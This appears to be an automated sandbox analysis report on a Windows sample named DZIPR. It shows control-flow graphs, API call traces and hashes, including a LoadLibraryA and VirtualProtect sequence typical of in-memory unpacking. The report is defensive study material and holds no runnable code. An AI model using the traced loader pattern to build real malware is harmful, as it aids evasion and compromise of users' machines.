                                        control_flow_graph 77 6fea64e0-6fea64e8 78 6fea64ea-6fea6501 77->78 78->78 79 6fea6503-6fea6513 78->79 80 6fea6526-6fea6551 79->80 81 6fea6515-6fea6522 79->81 82 6fea65f1 80->82 83 6fea6557-6fea6568 80->83 81->80 85 6fea65f3-6fea6661 LoadLibraryA VirtualProtect call 6fea67f8 VirtualProtect 82->85 84 6fea656c-6fea6577 83->84 86 6fea65da 84->86 87 6fea6579 84->87 95 6fea6682-6fea66a9 85->95 96 6fea6663 85->96 90 6fea65dc-6fea65e0 86->90 89 6fea657b-6fea6580 87->89 89->89 92 6fea6582-6fea6584 89->92 93 6fea65e6-6fea65eb 90->93 94 6fea6704-6fea6716 90->94 92->86 98 6fea6586-6fea658c 92->98 93->82 93->84 94->85 97 6fea6667-6fea6680 96->97 97->95 97->97 100 6fea66fa 98->100 101 6fea6592-6fea659c 98->101 100->94 102 6fea65a0-6fea65b7 101->102 102->102 103 6fea65b9-6fea65ca 102->103 103->90 104 6fea65cc-6fea65d8 103->104 104->90
                                        APIs
                                        • LoadLibraryA.KERNELBASE(00000000), ref: 6FEA6602
                                        • VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 6FEA663B
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: LibraryLoadProtectVirtual
                                        • String ID:
                                        • API String ID: 3279857687-0
                                        • Opcode ID: 8a6172e14e63b0cdfb04a1f425735b3736a1a5cce69153b06fd6a4b8d44fa76e
                                        • Instruction ID: 71d0f63ff8b0e58f8199337f82ed09c12966ea90a1f83022874dcda3f93b753c
                                        • Opcode Fuzzy Hash: 8a6172e14e63b0cdfb04a1f425735b3736a1a5cce69153b06fd6a4b8d44fa76e
                                        • Instruction Fuzzy Hash: 4251D1316083558FC715CF6CC88066AFBE6FFCA308F19896DE8855B316C632E956CB91

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 191 6fea6750-6fea6762 ReadFile 193 6fea630a-6fea6323 191->193 194 6fea61f0-6fea6207 191->194 195 6fea634d-6fea6368 193->195 196 6fea6325-6fea6329 193->196 197 6fea636a 195->197 198 6fea63cb 195->198 200 6fea6738 196->200 201 6fea632f 196->201 202 6fea636c-6fea6372 197->202 203 6fea63cd-6fea63ee 198->203 200->191 204 6fea6331-6fea633c 201->204 202->202 205 6fea6374-6fea6376 202->205 206 6fea66dc 203->206 204->204 207 6fea633e-6fea6347 204->207 205->198 208 6fea6378-6fea637e 205->208 206->200 207->195 209 6fea6349 207->209 208->206 210 6fea6384-6fea638d 208->210 209->195 211 6fea6391-6fea63a8 210->211 211->211 212 6fea63aa-6fea63ba 211->212 212->203 213 6fea63bc-6fea63c9 212->213 213->203
                                        APIs
                                        • ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,6FECC168), ref: 6FEA6300
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 1392d5d811b08c75bb1e1fce32fb3ceeeedde512118e5662146798a39e150e96
                                        • Instruction ID: 9baca7f1e1b0006907f493785f2bcc8848fd5c05c113904b51aa396aba961799
                                        • Opcode Fuzzy Hash: 1392d5d811b08c75bb1e1fce32fb3ceeeedde512118e5662146798a39e150e96
                                        • Instruction Fuzzy Hash: B841C535608B058FD704CF1DC84066ABBE2FFC7318F19856DE8899B315D636F85A8B81

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 214 6fea62d0-6fea62d5 215 6fea62db-6fea62e0 214->215 216 6fea6742-6fea674e 214->216 217 6fea626d-6fea627b 215->217 218 6fea62e2-6fea62f1 215->218 219 6fea62cf 217->219 220 6fea627d 217->220 223 6fea62f3-6fea6304 ReadFile 218->223 224 6fea62d1-6fea62d5 219->224 222 6fea627f-6fea6284 220->222 222->222 225 6fea6286-6fea6288 222->225 226 6fea630a-6fea6323 223->226 227 6fea61f0-6fea6207 223->227 224->215 224->216 225->219 228 6fea628a-6fea6290 225->228 229 6fea634d-6fea6368 226->229 230 6fea6325-6fea6329 226->230 233 6fea66d2 228->233 234 6fea6296-6fea629a 228->234 231 6fea636a 229->231 232 6fea63cb 229->232 236 6fea6738-6fea6762 230->236 237 6fea632f 230->237 238 6fea636c-6fea6372 231->238 240 6fea63cd-6fea63ee 232->240 233->216 239 6fea629c-6fea62b2 234->239 236->223 241 6fea6331-6fea633c 237->241 238->238 242 6fea6374-6fea6376 238->242 239->239 243 6fea62b4-6fea62c1 239->243 244 6fea66dc 240->244 241->241 245 6fea633e-6fea6347 241->245 242->232 247 6fea6378-6fea637e 242->247 243->224 248 6fea62c3-6fea62cd 243->248 244->236 245->229 249 6fea6349 245->249 247->244 250 6fea6384-6fea638d 247->250 248->224 249->229 251 6fea6391-6fea63a8 250->251 251->251 252 6fea63aa-6fea63ba 251->252 252->240 253 6fea63bc-6fea63c9 252->253 253->240
                                        APIs
                                        • ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,6FECC168), ref: 6FEA6300
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 55af5fb6f8dd25c2212c9855496232efeba4171855623fd9fea8ed2c8da5a436
                                        • Instruction ID: 0b8c80ea2f14e0a779f29237db2009a2a906da7426b6209d7e9d3a57c4d9b96c
                                        • Opcode Fuzzy Hash: 55af5fb6f8dd25c2212c9855496232efeba4171855623fd9fea8ed2c8da5a436
                                        • Instruction Fuzzy Hash: 1A31A231A08B058FC714CF19C49466ABFE2AFC6314F29896DE8955B316D632F85ACB81

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 254 6feac050-6feac068 call 6feb50c9 257 6feac06a call 6fea6dc1 254->257 258 6feac06f-6feac072 254->258 257->258 260 6feac0aa-6feac0bb call 6feaba5b 258->260 261 6feac074-6feac07c 258->261 269 6feac0bd-6feac0cb call 6feabe0d 260->269 270 6feac0d0-6feac0d7 call 6feb51a1 260->270 263 6feac07e-6feac09d call 6feabd66 261->263 264 6feac09f call 6feabc4e 261->264 263->257 263->264 268 6feac0a4-6feac0a8 264->268 268->257 268->260 269->270
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6FEAC057
                                          • Part of subcall function 6FEA6DC1: __CxxThrowException@8.LIBCMT ref: 6FEA6DD7
                                          • Part of subcall function 6FEA6DC1: __EH_prolog3.LIBCMT ref: 6FEA6DE4
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: H_prolog3$Exception@8Throw
                                        • String ID:
                                        • API String ID: 2489616738-0
                                        • Opcode ID: 0f676ed95064eb1952ea83a60457d27e78bdbd5d7c23e10cd9e3c02fd3459977
                                        • Instruction ID: bf6882c759072826d2092a89bb9d53df3ff690e3997c17bb6a89033d991da160
                                        • Opcode Fuzzy Hash: 0f676ed95064eb1952ea83a60457d27e78bdbd5d7c23e10cd9e3c02fd3459977
                                        • Instruction Fuzzy Hash: 10017C30B007068BDB19AF78C85166D3EA2AF82369F30842DE4618F3D0DF73D9219B51

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 276 6fea60f0-6fea6139 CreateFileW 277 6fea61de-6fea6780 276->277 278 6fea613f-6fea67e4 276->278 285 6fea5eba-6fea5f0c GlobalAlloc 278->285 286 6fea5e23-6fea5e3c 278->286 287 6fea5fad 285->287 288 6fea5f12-6fea5f2b 285->288 289 6fea5e40-6fea5e4e 286->289 291 6fea5faf-6fea5fce 287->291 292 6fea5f2f-6fea5f3d 288->292 293 6fea5ea3 289->293 294 6fea5e50 289->294 304 6fea5fd0 291->304 305 6fea5fe7-6fea5fea 291->305 297 6fea5f3f 292->297 298 6fea5f92 292->298 295 6fea5ea5-6fea5ea9 293->295 299 6fea5e52-6fea5e58 294->299 300 6fea5eaf-6fea5eb4 295->300 301 6fea67c3-6fea67d8 295->301 302 6fea5f41-6fea5f47 297->302 306 6fea5f94-6fea5f98 298->306 299->299 303 6fea5e5a-6fea5e5c 299->303 300->289 310 6fea5eb6 300->310 302->302 311 6fea5f49-6fea5f4b 302->311 303->293 312 6fea5e5e-6fea5e64 303->312 313 6fea5fd2-6fea5fe5 304->313 314 6fea5ffe-6fea6038 305->314 315 6fea5fec 305->315 308 6fea5f9e-6fea5fa3 306->308 309 6fea67a5-6fea67be 306->309 308->292 316 6fea5fa5-6fea5fa9 308->316 309->291 310->285 311->298 317 6fea5f4d-6fea5f53 311->317 318 6fea66aa-6fea66af 312->318 319 6fea5e6a-6fea5e6e 312->319 313->305 313->313 321 6fea60d9 314->321 322 6fea603e-6fea6057 314->322 320 6fea5fee-6fea5ffc 315->320 316->287 325 6fea5f59-6fea5f5d 317->325 326 6fea66b4 317->326 324 6fea5e90-6fea5e95 318->324 327 6fea5e70-6fea5e86 319->327 320->314 320->320 328 6fea60db-6fea60ef 321->328 323 6fea605b-6fea6069 322->323 329 6fea606b 323->329 330 6fea60be 323->330 324->295 333 6fea5e97-6fea5ea1 324->333 331 6fea5f5f-6fea5f75 325->331 336 6fea66be 326->336 327->327 332 6fea5e88-6fea5e8c 327->332 334 6fea606d-6fea6073 329->334 335 6fea60c0-6fea60c4 330->335 331->331 337 6fea5f77-6fea5f84 331->337 332->324 333->295 334->334 338 6fea6075-6fea6077 334->338 339 6fea60ca-6fea60cf 335->339 340 6fea6788-6fea67a0 335->340 336->340 337->306 341 6fea5f86-6fea5f90 337->341 338->330 342 6fea6079-6fea607f 338->342 339->323 343 6fea60d1-6fea60d5 339->343 340->328 341->306 342->336 344 6fea6085-6fea6089 342->344 343->321 345 6fea608b-6fea60a1 344->345 345->345 346 6fea60a3-6fea60b0 345->346 346->335 347 6fea60b2-6fea60bc 346->347 347->335
                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000004,00000080,00000000), ref: 6FEA60F6
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 3b56854a3ea94ea5570fbf342dd6f0d7df7ef42770928b9a9678f8459d3431d8
                                        • Instruction ID: 339eee4219ad2d6a605852f5d355ee0c3ec7c1346730e2140be10a8546b7cc78
                                        • Opcode Fuzzy Hash: 3b56854a3ea94ea5570fbf342dd6f0d7df7ef42770928b9a9678f8459d3431d8
                                        • Instruction Fuzzy Hash: 0601E8B49087019FC718CF4AC89090AFBE6FFC9318F16852EA88897326C631E851CF85

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 348 6feba6f4-6feba716 HeapCreate 349 6feba71a-6feba723 348->349 350 6feba718-6feba719 348->350
                                        APIs
                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,6FEB4776,00000001,?,?,?,6FEB48EF,?,?,?,6FECE848,0000000C,6FEB49AA), ref: 6FEBA709
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CreateHeap
                                        • String ID:
                                        • API String ID: 10892065-0
                                        • Opcode ID: 75bbe5e544dceadbf7365eaf7070beb579e942729ddbef6e1f742736b8861fed
                                        • Instruction ID: d7bdc2a029ea094c834b4be359c1948195b7adbbea023d1064bf33657c32cde3
                                        • Opcode Fuzzy Hash: 75bbe5e544dceadbf7365eaf7070beb579e942729ddbef6e1f742736b8861fed
                                        • Instruction Fuzzy Hash: 06D05E325987549AEF009E756D097263FECE7867A6F244476F80DC6580E570D6A08A04
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6FEA7498
                                        • GetFullPathNameW.KERNEL32(00000000,00000104,00000000,?,00000268,6FEA76D5,?,00000000,?,00000000,00000104,00000000,?,6FECBEF4,00000000), ref: 6FEA74D6
                                          • Part of subcall function 6FEA6DC1: __CxxThrowException@8.LIBCMT ref: 6FEA6DD7
                                          • Part of subcall function 6FEA6DC1: __EH_prolog3.LIBCMT ref: 6FEA6DE4
                                        • PathIsUNCW.SHLWAPI(?,00000000,?), ref: 6FEA7546
                                        • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6FEA756D
                                        • CharUpperW.USER32(00000000), ref: 6FEA75A0
                                        • FindFirstFileW.KERNEL32(?,?), ref: 6FEA75BC
                                        • FindClose.KERNEL32(00000000), ref: 6FEA75C8
                                        • lstrlenW.KERNEL32(?), ref: 6FEA75E6
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3H_prolog3_InformationNameThrowUpperVolumelstrlen
                                        • String ID:
                                        • API String ID: 624941980-0
                                        • Opcode ID: b08b50657841b5c189209ef57c7aa1eb5459e254d86763d5cca513cdf25ddcd2
                                        • Instruction ID: 5b8c8af0e447f26e29c36b3aa8518feed98937f62c369d85d4383c7ba5440904
                                        • Opcode Fuzzy Hash: b08b50657841b5c189209ef57c7aa1eb5459e254d86763d5cca513cdf25ddcd2
                                        • Instruction Fuzzy Hash: 5841B3719086159BDF14DF64CD4CBAE7F78AF42318F2002EDE8299A194DB379A95CF10
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: _memset
                                        • String ID: @$@$AfxFrameOrView90su$AfxMDIFrame90su
                                        • API String ID: 2102423945-1093365818
                                        • Opcode ID: 1d84634bb6acc6f257c91b6de10fc7a07a983b914c8ffdf66e25254e1c99a14d
                                        • Instruction ID: 3db9333bb29afc610f0453e7492bd1bdcb3f6ea9f83f8d9d6a3886328af066bb
                                        • Opcode Fuzzy Hash: 1d84634bb6acc6f257c91b6de10fc7a07a983b914c8ffdf66e25254e1c99a14d
                                        • Instruction Fuzzy Hash: 7991F271D0030DAEDB41CFA4C685BDEBFF8AF54348F20916EE918E6284EB749645C7A1
                                        APIs
                                        • IsDebuggerPresent.KERNEL32 ref: 6FEB7C6C
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6FEB7C81
                                        • UnhandledExceptionFilter.KERNEL32(6FECA4B8), ref: 6FEB7C8C
                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 6FEB7CA8
                                        • TerminateProcess.KERNEL32(00000000), ref: 6FEB7CAF
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                        • String ID:
                                        • API String ID: 2579439406-0
                                        • Opcode ID: b9999a17af9c0dde4e3c7c9317103c1d04e0357f3052e58d54879d295ec65940
                                        • Instruction ID: 53dbb4b19edaca75055a2cf142dec8589b7609f9e7ac613d46a84a20ea1f6986
                                        • Opcode Fuzzy Hash: b9999a17af9c0dde4e3c7c9317103c1d04e0357f3052e58d54879d295ec65940
                                        • Instruction Fuzzy Hash: A2210374406B04DFDB40CF6CEA496483FB9FB8B325F60005AF4088BB94D7B055A98F41
                                        APIs
                                        • GetLocaleInfoW.KERNEL32(00000800,00000003,?,00000004), ref: 6FEA89FC
                                        • __snwprintf_s.LIBCMT ref: 6FEA8A2E
                                        • LoadLibraryW.KERNEL32(?), ref: 6FEA8A69
                                          • Part of subcall function 6FEB5348: __getptd_noexit.LIBCMT ref: 6FEB5348
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s
                                        • String ID: LOC
                                        • API String ID: 3175857669-519433814
                                        • Opcode ID: d9162bf362fe9b995136a88a5b984dc4cc1c2826e7fe73bfccc3fa4fbc2f5a89
                                        • Instruction ID: 71772f8e375b510447afbc6b004d71c6dc2747ea49d4cbe174cfbb4ab4472cbf
                                        • Opcode Fuzzy Hash: d9162bf362fe9b995136a88a5b984dc4cc1c2826e7fe73bfccc3fa4fbc2f5a89
                                        • Instruction Fuzzy Hash: E211B771A55304ABDB509B78CD45BAE7FACAF02358F30006DE114AB1D4EB759B048761
                                        APIs
                                          • Part of subcall function 6FEB2C57: GetWindowLongW.USER32(?,000000F0), ref: 6FEB2C62
                                        • GetKeyState.USER32(00000010), ref: 6FEB0514
                                        • GetKeyState.USER32(00000011), ref: 6FEB051D
                                        • GetKeyState.USER32(00000012), ref: 6FEB0526
                                        • SendMessageW.USER32(?,00000111,0000E146,00000000), ref: 6FEB053C
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: State$LongMessageSendWindow
                                        • String ID:
                                        • API String ID: 1063413437-0
                                        • Opcode ID: b1985230b56f184322543e7caf43fdfc048a366c4e04650cca5a02d33a39d7ff
                                        • Instruction ID: a9cdcec328def75cdcf3d38f602dda46cf97f6cdf4b136ef79a8324c10c99170
                                        • Opcode Fuzzy Hash: b1985230b56f184322543e7caf43fdfc048a366c4e04650cca5a02d33a39d7ff
                                        • Instruction Fuzzy Hash: C7F0E93574939FA5EA2121744F01FFD0D295F81BF4F20243EAB55AA5E8CEB0E5024670
                                        APIs
                                        • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 6FEAE61F
                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 6FEAE634
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Window$CallNtdllProcProc_
                                        • String ID:
                                        • API String ID: 1646280189-0
                                        • Opcode ID: 45b2c48f7aa35ae5d4afbf1c6b76034233e0d3edd4d5f56ad1b6bdc6c6978fad
                                        • Instruction ID: ded108aa21e38832b7a979f16e90e380c56ae96b13c9b3aa3cad67aa7f76c954
                                        • Opcode Fuzzy Hash: 45b2c48f7aa35ae5d4afbf1c6b76034233e0d3edd4d5f56ad1b6bdc6c6978fad
                                        • Instruction Fuzzy Hash: EFF0F836104605EBCF114FA9C804DDA7FB9FF49765B149868FA598A520D733E920EB40
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1ad396ed6323342f5f720d067790cff40122326ba0a9e7acca6ba6a4ce919255
                                        • Instruction ID: 510cfbdf7be3fdc543a2b6710b4febf70b1838e322ac78f7d4f73b7a70621974
                                        • Opcode Fuzzy Hash: 1ad396ed6323342f5f720d067790cff40122326ba0a9e7acca6ba6a4ce919255
                                        • Instruction Fuzzy Hash: 22F08C32041228FB8F025E958F04DCB3F2AEF09325B109419FB6465090C331F521DBA1
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6FEA8BE9
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,00000260,6FEA8EB7,?,?), ref: 6FEA8C19
                                        • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6FEA8C2D
                                        • ConvertDefaultLocale.KERNEL32(?), ref: 6FEA8C69
                                        • ConvertDefaultLocale.KERNEL32(?), ref: 6FEA8C77
                                        • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6FEA8C94
                                        • ConvertDefaultLocale.KERNEL32(?), ref: 6FEA8CBF
                                        • ConvertDefaultLocale.KERNEL32(000003FF), ref: 6FEA8CC8
                                        • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 6FEA8CE1
                                        • EnumResourceLanguagesW.KERNEL32(00000000,00000010,00000001,Function_000084C0,?), ref: 6FEA8CFE
                                        • ConvertDefaultLocale.KERNEL32(?), ref: 6FEA8D31
                                        • ConvertDefaultLocale.KERNEL32(00000000), ref: 6FEA8D3A
                                        • GetModuleFileNameW.KERNEL32(6FEA0000,?,00000105), ref: 6FEA8D7F
                                        • _memset.LIBCMT ref: 6FEA8D9F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
                                        • String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                        • API String ID: 3537336938-2299501126
                                        • Opcode ID: 118f16401eeaac4fe03902bb580e94bde61035cccd333d6d9253033f9603d799
                                        • Instruction ID: 27813abc082b4d8b3cd307fe778854f14c73635c6b1e3e961e80bdc0a508e8b9
                                        • Opcode Fuzzy Hash: 118f16401eeaac4fe03902bb580e94bde61035cccd333d6d9253033f9603d799
